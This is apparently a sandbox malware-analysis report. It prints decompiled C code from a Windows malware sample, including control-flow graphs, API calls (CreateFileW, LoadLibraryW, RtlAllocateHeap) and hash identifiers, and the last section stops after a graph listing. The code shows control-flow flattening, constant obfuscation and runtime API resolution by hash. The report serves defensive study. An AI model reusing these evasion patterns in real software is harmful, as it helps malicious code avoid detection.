                                                        • Instruction ID: dc6f1ee4a84ce5bda6dc1de3894ffdfe6af7e5c4f2706569a0a07e7ad6572c4d
                                                        • Opcode Fuzzy Hash: ff3a2a27c378dfd3a74e106611e12034dfe14fd076bef55b48d525b46ae76988
                                                        • Instruction Fuzzy Hash: FB21BC347003019BEB25AF7ACC51BFB3BA6ABD0B00F00852DB654CB2A1FA78DD458795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 375 7b80a0-7b815b 376 7b8163-7b8168 375->376 377 7b8170-7b8175 376->377 378 7b817b 377->378 379 7b8338-7b833d 377->379 380 7b8181-7b8186 378->380 381 7b8287-7b829b call 7b34c0 378->381 382 7b836f-7b8377 379->382 383 7b833f-7b8344 379->383 387 7b818c-7b8191 380->387 388 7b8252-7b8259 380->388 404 7b82bb-7b82e3 381->404 405 7b829d-7b82b5 call 7b3f00 call 7b3e60 381->405 385 7b8379-7b8391 call 7b3f00 call 7b3e60 382->385 386 7b8397-7b83bb CreateFileW 382->386 389 7b8346-7b834b 383->389 390 7b8365-7b836a 383->390 385->386 393 7b83ee-7b83fa 386->393 394 7b83bd-7b83c2 386->394 397 7b81e3-7b821a 387->397 398 7b8193-7b8198 387->398 395 7b825b-7b8271 call 7b3f00 call 7b3e60 388->395 396 7b8276-7b8282 388->396 399 7b834d-7b8352 389->399 400 7b83c7-7b83ce 389->400 390->377 394->377 395->396 396->377 401 7b821c-7b8232 call 7b3f00 call 7b3e60 397->401 402 7b8237-7b824d 397->402 398->399 410 7b819e-7b81e1 call 7bb6e0 398->410 399->377 403 7b8358-7b8364 399->403 408 7b83eb 400->408 409 7b83d0-7b83e6 call 7b3f00 call 7b3e60 400->409 401->402 402->377 428 7b8300-7b830b 404->428 429 7b82e5-7b82fb call 7b3f00 call 7b3e60 404->429 405->404 408->393 409->408 410->377 438 7b8328-7b8333 428->438 439 7b830d-7b8323 call 7b3f00 call 7b3e60 428->439 429->428 438->376 439->438
                                                        C-Code - Quality: 66%
                                                        			E007B80A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				intOrPtr* _t68;
                                                        				void* _t72;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t79;
                                                        				void* _t81;
                                                        				void* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t87;
                                                        				intOrPtr _t88;
                                                        				intOrPtr* _t89;
                                                        				void* _t91;
                                                        				void* _t95;
                                                        				intOrPtr _t100;
                                                        				char _t104;
                                                        				signed int _t121;
                                                        				void* _t124;
                                                        				void* _t126;
                                                        				void* _t127;
                                                        				signed int* _t128;
                                                        				void* _t130;
                                                        
                                                        				_t121 = __edx;
                                                        				_t128 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t127 = _v584;
                                                        				_t95 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t130 = _t58 - 0xea5411f;
                                                        							if(_t130 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t130 == 0) {
                                                        								_t72 = E007B34C0(0x7bd970);
                                                        								_t121 =  *0x7be158;
                                                        								_t126 = _t72;
                                                        								if(_t121 == 0) {
                                                        									_t121 = E007B3E60(_t95, E007B3F00(0xc6fbcd74), 0xba71dd03, _t127);
                                                        									 *0x7be158 = _t121;
                                                        								}
                                                        								_t100 =  *0x7be54c; // 0x54e0e0
                                                        								_t50 = _t100 + 0x260; // 0x54e340
                                                        								_t51 = _t100 + 0x18; // 0x54e0f8
                                                        								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
                                                        								_t77 =  *0x7be494;
                                                        								_t128 =  &(_t128[5]);
                                                        								if(_t77 == 0) {
                                                        									_t82 = E007B3F00(0x9bab0b12);
                                                        									_t121 = 0x7facde30;
                                                        									_t77 = E007B3E60(_t95, _t82, 0x7facde30, _t127);
                                                        									 *0x7be494 = _t77;
                                                        								}
                                                        								_t124 =  *_t77();
                                                        								_t79 =  *0x7bdf30;
                                                        								if(_t79 == 0) {
                                                        									_t81 = E007B3F00(0x9bab0b12);
                                                        									_t121 = 0x5010a54d;
                                                        									_t79 = E007B3E60(_t95, _t81, 0x5010a54d, _t127);
                                                        									 *0x7bdf30 = _t79;
                                                        								}
                                                        								 *_t79(_t124, 0, _t126);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t85 =  *0x7be1d4;
                                                        									if(_t85 == 0) {
                                                        										_t87 = E007B3F00(0x9bab0b12);
                                                        										_t121 = 0xa229df38;
                                                        										_t85 = E007B3E60(_t95, _t87, 0xa229df38, _t127);
                                                        										 *0x7be1d4 = _t85;
                                                        									}
                                                        									 *_t85( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t88 = _v568;
                                                        										_t104 = _v572;
                                                        										_v560 = _t88;
                                                        										_v552 = _t88;
                                                        										_v544 = _t88;
                                                        										_v536 = _t88;
                                                        										_t89 =  *0x7bdee4;
                                                        										_v564 = _t104;
                                                        										_v556 = _t104;
                                                        										_v548 = _t104;
                                                        										_v540 = _t104;
                                                        										_v532 = 0;
                                                        										if(_t89 == 0) {
                                                        											_t91 = E007B3F00(0x9bab0b12);
                                                        											_t121 = 0x4bf45878;
                                                        											_t89 = E007B3E60(_t95, _t91, 0x4bf45878, _t127);
                                                        											 *0x7bdee4 = _t89;
                                                        										}
                                                        										 *_t89(_t127, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t95 =  !=  ? 1 : _t95;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E007BB6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t121;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x7bde04 == 0) {
                                                        								_t66 = E007B3F00(0x9bab0b12);
                                                        								_t121 = 0xb66d748a;
                                                        								 *0x7bde04 = E007B3E60(_t95, _t66, 0xb66d748a, _t127);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t127 = _t64;
                                                        							if(_t127 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									_t68 =  *0x7bde3c;
                                                        									if(_t68 == 0) {
                                                        										_t68 = E007B3E60(_t95, E007B3F00(0x9bab0b12), 0x20de7595, _t127);
                                                        										 *0x7bde3c = _t68;
                                                        									}
                                                        									 *_t68(_t127);
                                                        									L34:
                                                        									return _t95;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t95;
                                                        					goto L35;
                                                        				}
                                                        			}














































                                                        0x007b80a0
                                                        0x007b80a0
                                                        0x007b80a6
                                                        0x007b80ae
                                                        0x007b80b3
                                                        0x007b80bb
                                                        0x007b80c3
                                                        0x007b80ca
                                                        0x007b80ce
                                                        0x007b80d2
                                                        0x007b80d9
                                                        0x007b80e0
                                                        0x007b80e7
                                                        0x007b80ee
                                                        0x007b80f5
                                                        0x007b80fc
                                                        0x007b8103
                                                        0x007b8112
                                                        0x007b8116
                                                        0x007b8119
                                                        0x007b811d
                                                        0x007b8125
                                                        0x007b8133
                                                        0x007b8137
                                                        0x007b813f
                                                        0x007b8147
                                                        0x007b814f
                                                        0x007b8153
                                                        0x007b815b
                                                        0x007b8163
                                                        0x007b8163
                                                        0x007b8168
                                                        0x007b8170
                                                        0x007b8170
                                                        0x007b8170
                                                        0x007b8170
                                                        0x007b8175
                                                        0x00000000
                                                        0x00000000
                                                        0x007b817b
                                                        0x007b828c
                                                        0x007b8291
                                                        0x007b8297
                                                        0x007b829b
                                                        0x007b82b3
                                                        0x007b82b5
                                                        0x007b82b5
                                                        0x007b82bb
                                                        0x007b82c1
                                                        0x007b82c8
                                                        0x007b82d7
                                                        0x007b82d9
                                                        0x007b82de
                                                        0x007b82e3
                                                        0x007b82ea
                                                        0x007b82ef
                                                        0x007b82f6
                                                        0x007b82fb
                                                        0x007b82fb
                                                        0x007b8302
                                                        0x007b8304
                                                        0x007b830b
                                                        0x007b8312
                                                        0x007b8317
                                                        0x007b831e
                                                        0x007b8323
                                                        0x007b8323
                                                        0x007b832c
                                                        0x007b832e
                                                        0x00000000
                                                        0x007b8181
                                                        0x007b8186
                                                        0x007b8252
                                                        0x007b8259
                                                        0x007b8260
                                                        0x007b8265
                                                        0x007b826c
                                                        0x007b8271
                                                        0x007b8271
                                                        0x007b827b
                                                        0x007b827d
                                                        0x00000000
                                                        0x007b818c
                                                        0x007b8191
                                                        0x007b81e3
                                                        0x007b81e7
                                                        0x007b81eb
                                                        0x007b81ef
                                                        0x007b81f3
                                                        0x007b81f7
                                                        0x007b81fb
                                                        0x007b8200
                                                        0x007b8204
                                                        0x007b8208
                                                        0x007b820c
                                                        0x007b8210
                                                        0x007b821a
                                                        0x007b8221
                                                        0x007b8226
                                                        0x007b822d
                                                        0x007b8232
                                                        0x007b8232
                                                        0x007b8241
                                                        0x007b8245
                                                        0x007b824a
                                                        0x00000000
                                                        0x007b8193
                                                        0x007b8198
                                                        0x00000000
                                                        0x007b819e
                                                        0x007b81a0
                                                        0x007b81a8
                                                        0x007b81c4
                                                        0x007b81c8
                                                        0x007b81d4
                                                        0x007b81d8
                                                        0x007b81dd
                                                        0x00000000
                                                        0x007b81dd
                                                        0x007b8198
                                                        0x007b8191
                                                        0x007b8186
                                                        0x00000000
                                                        0x007b817b
                                                        0x007b833d
                                                        0x007b8377
                                                        0x007b837e
                                                        0x007b8383
                                                        0x007b8391
                                                        0x007b8391
                                                        0x007b83b4
                                                        0x007b83b6
                                                        0x007b83bb
                                                        0x00000000
                                                        0x007b83bd
                                                        0x007b83bd
                                                        0x00000000
                                                        0x007b83bd
                                                        0x007b833f
                                                        0x007b8344
                                                        0x007b8365
                                                        0x00000000
                                                        0x007b8346
                                                        0x007b834b
                                                        0x007b83c7
                                                        0x007b83ce
                                                        0x007b83e1
                                                        0x007b83e6
                                                        0x007b83e6
                                                        0x007b83ec
                                                        0x007b83f1
                                                        0x007b83fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x007b834b
                                                        0x007b8344
                                                        0x00000000
                                                        0x007b834d
                                                        0x007b834d
                                                        0x007b8364
                                                        0x00000000
                                                        0x007b8364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 007B83B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: T
                                                        • API String ID: 823142352-373082590
                                                        • Opcode ID: 9e6905c4867faf5d28e4d7f3a88db2175bd3f3ea065319109113d9d2feb97a89
                                                        • Instruction ID: edac58c68a148c7426a337b52ac647fe21a385b2d04e05875ca8e9d0a0f77cb9
                                                        • Opcode Fuzzy Hash: 9e6905c4867faf5d28e4d7f3a88db2175bd3f3ea065319109113d9d2feb97a89
                                                        • Instruction Fuzzy Hash: 5D81AA706083058FD758DF68C854BAFB6E9AB98748F10492EF085CB290EB78DD41CB56
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 529 7b30a0-7b30b6 530 7b30ba-7b30bf 529->530 531 7b30c0-7b30c5 530->531 532 7b30cb 531->532 533 7b3201-7b3206 531->533 534 7b31ed-7b31f1 532->534 535 7b30d1-7b30d6 532->535 536 7b3208-7b320d 533->536 537 7b3245-7b324c 533->537 540 7b31f7-7b31fc 534->540 541 7b32f6-7b3300 534->541 542 7b31da-7b31e8 535->542 543 7b30dc-7b30e1 535->543 544 7b32ab-7b32b3 536->544 545 7b3213-7b3218 536->545 538 7b3269-7b3274 537->538 539 7b324e-7b3264 call 7b3f00 call 7b3e60 537->539 564 7b3291-7b329f RtlAllocateHeap 538->564 565 7b3276-7b328c call 7b3f00 call 7b3e60 538->565 539->538 540->531 542->531 549 7b31a0-7b31a8 543->549 550 7b30e7-7b30ec 543->550 546 7b32d3-7b32f3 544->546 547 7b32b5-7b32cd call 7b3f00 call 7b3e60 544->547 551 7b321a-7b3228 call 7b3d00 545->551 552 7b322d-7b3232 545->552 546->541 547->546 558 7b31aa-7b31c2 call 7b3f00 call 7b3e60 549->558 559 7b31c8-7b31d5 549->559 550->552 556 7b30f2-7b319b 550->556 551->530 552->531 560 7b3238-7b3242 552->560 556->530 558->559 559->530 564->541 572 7b32a1-7b32a6 564->572 565->564 572->530
                                                        C-Code - Quality: 71%
                                                        			E007B30A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x7be1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E007B3E60(_t93, E007B3F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x7be1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x7be494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E007B3E60(_t93, E007B3F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x7be494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x7bdd18 == 0) {
                                                        								 *0x7bdd18 = E007B3E60(_t93, E007B3F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x7be43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E007B3E60(_t93, E007B3F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x7be43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E007B3D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x007b30a2
                                                        0x007b30a6
                                                        0x007b30ac
                                                        0x007b30b1
                                                        0x007b30b6
                                                        0x007b30ba
                                                        0x007b30ba
                                                        0x007b30c0
                                                        0x007b30c0
                                                        0x007b30c0
                                                        0x007b30c0
                                                        0x007b30c5
                                                        0x00000000
                                                        0x00000000
                                                        0x007b30cb
                                                        0x007b31f1
                                                        0x007b32f9
                                                        0x007b3300
                                                        0x007b31f7
                                                        0x007b31f7
                                                        0x00000000
                                                        0x007b31f7
                                                        0x007b30d1
                                                        0x007b30d6
                                                        0x007b31e5
                                                        0x00000000
                                                        0x007b30dc
                                                        0x007b30e1
                                                        0x007b31a0
                                                        0x007b31a8
                                                        0x007b31c0
                                                        0x007b31c2
                                                        0x007b31c2
                                                        0x007b31ce
                                                        0x007b31d0
                                                        0x007b30ba
                                                        0x007b30ba
                                                        0x00000000
                                                        0x007b30ba
                                                        0x007b30e7
                                                        0x007b30ec
                                                        0x00000000
                                                        0x007b30f2
                                                        0x007b30f2
                                                        0x007b310d
                                                        0x007b3111
                                                        0x007b311f
                                                        0x007b3123
                                                        0x007b3130
                                                        0x007b3139
                                                        0x007b3147
                                                        0x007b314b
                                                        0x007b3153
                                                        0x007b315b
                                                        0x007b3175
                                                        0x007b317f
                                                        0x007b3187
                                                        0x007b318b
                                                        0x007b3193
                                                        0x007b30ba
                                                        0x007b30ba
                                                        0x00000000
                                                        0x007b30ba
                                                        0x007b30ba
                                                        0x007b30ec
                                                        0x007b30e1
                                                        0x007b30d6
                                                        0x00000000
                                                        0x007b30cb
                                                        0x007b3206
                                                        0x007b3245
                                                        0x007b324c
                                                        0x007b325f
                                                        0x007b3264
                                                        0x007b3264
                                                        0x007b326b
                                                        0x007b3274
                                                        0x007b328c
                                                        0x007b328c
                                                        0x007b3299
                                                        0x007b329b
                                                        0x007b329f
                                                        0x00000000
                                                        0x007b32a1
                                                        0x007b32a1
                                                        0x00000000
                                                        0x007b32a1
                                                        0x007b3208
                                                        0x007b320d
                                                        0x007b32ab
                                                        0x007b32b3
                                                        0x007b32cb
                                                        0x007b32cd
                                                        0x007b32cd
                                                        0x007b32e4
                                                        0x007b32e6
                                                        0x007b32ed
                                                        0x007b32f0
                                                        0x007b32f3
                                                        0x00000000
                                                        0x007b3213
                                                        0x007b3218
                                                        0x00000000
                                                        0x007b321a
                                                        0x007b3221
                                                        0x007b3223
                                                        0x007b30ba
                                                        0x007b30ba
                                                        0x00000000
                                                        0x007b30ba
                                                        0x007b30ba
                                                        0x007b3218
                                                        0x007b320d
                                                        0x00000000
                                                        0x007b322d
                                                        0x007b322d
                                                        0x007b3242
                                                        0x00000000
                                                        0x007b3242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 007B3299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: e588eeb5f897a34bde6983e5bf3524e3c90f2f0bc6255a70f3d4874c3f460983
                                                        • Instruction ID: 52f2defc7a68dd1550a4b55783b48c46c84937eb29cf004308d768eb00ca40a5
                                                        • Opcode Fuzzy Hash: e588eeb5f897a34bde6983e5bf3524e3c90f2f0bc6255a70f3d4874c3f460983
                                                        • Instruction Fuzzy Hash: EF51A071B083058BC718DF6C84857AABBE6EBD4344F60492EF451CB351DB39DE898792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 7b7080-7b7092 call 7b34c0 583 7b70af-7b70c3 LoadLibraryW 580->583 584 7b7094-7b70aa call 7b3f00 call 7b3e60 580->584 586 7b70e0-7b70eb 583->586 587 7b70c5-7b70db call 7b3f00 call 7b3e60 583->587 584->583 593 7b7108-7b7110 586->593 594 7b70ed-7b7103 call 7b3f00 call 7b3e60 586->594 587->586 594->593
                                                        C-Code - Quality: 75%
                                                        			E007B7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E007B34C0(__ecx);
                                                        				if( *0x7bdd1c == 0) {
                                                        					 *0x7bdd1c = E007B3E60(__ebx, E007B3F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x7be548; // 0x587e58
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x7be494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E007B3E60(_t15, E007B3F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x7be494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x7bdf30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E007B3E60(_t15, E007B3F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x7bdf30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x007b7080
                                                        0x007b7082
                                                        0x007b7089
                                                        0x007b7092
                                                        0x007b70aa
                                                        0x007b70aa
                                                        0x007b70b0
                                                        0x007b70b2
                                                        0x007b70b8
                                                        0x007b70bc
                                                        0x007b70c3
                                                        0x007b70d6
                                                        0x007b70db
                                                        0x007b70db
                                                        0x007b70e2
                                                        0x007b70e4
                                                        0x007b70eb
                                                        0x007b70fe
                                                        0x007b7103
                                                        0x007b7103
                                                        0x007b7110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,007B721D,007B68AC), ref: 007B70B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                        • Associated: 0000000A.00000002.2271273797.00000000007B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271290366.00000000007BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000A.00000002.2271300426.00000000007BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7b0000_SampleRes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: X~X
                                                        • API String ID: 1029625771-1239559076
                                                        • Opcode ID: d696d0df5342a7b010e898256c643fa4e78fcbbb97eb6bb82776a349fbd30dfc
                                                        • Instruction ID: fc833d1f9427dcfd406302bf31531d1635803034fa7f7c7cf6f3e2eff855e0da
                                                        • Opcode Fuzzy Hash: d696d0df5342a7b010e898256c643fa4e78fcbbb97eb6bb82776a349fbd30dfc
                                                        • Instruction Fuzzy Hash: 2101A2307142108F9B24AF799C54BBB3AABDBD0658710852AF019CB315FE3CDD418794
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 603 7a0580-7a05be call 7a0ed0 606 7a05d2-7a05da 603->606 607 7a05c0-7a05cf 603->607 608 7a05e0-7a05e3 606->608 609 7a06e7-7a06ef 606->609 608->609 610 7a05e9-7a05eb 608->610 610->609 611 7a05f1-7a05fc 610->611 611->609 613 7a0602-7a0607 611->613 614 7a06d8-7a06e4 613->614 615 7a060d-7a0629 call 7a1140 RtlMoveMemory 613->615 618 7a062b-7a0630 615->618 619 7a0654-7a0659 615->619 620 7a0632-7a0641 618->620 621 7a0643-7a0652 618->621 622 7a065b-7a066a 619->622 623 7a066c-7a0678 619->623 624 7a0679-7a0699 call 7a1140 620->624 621->624 622->624 623->624 624->609 627 7a069b-7a06a3 VirtualProtect 624->627 628 7a06c6-7a06d5 627->628 629 7a06a5-7a06a8 627->629 629->609 630 7a06aa-7a06ad 629->630 630->609 631 7a06af-7a06b1 630->631 631->615 632 7a06b7-7a06c3 631->632
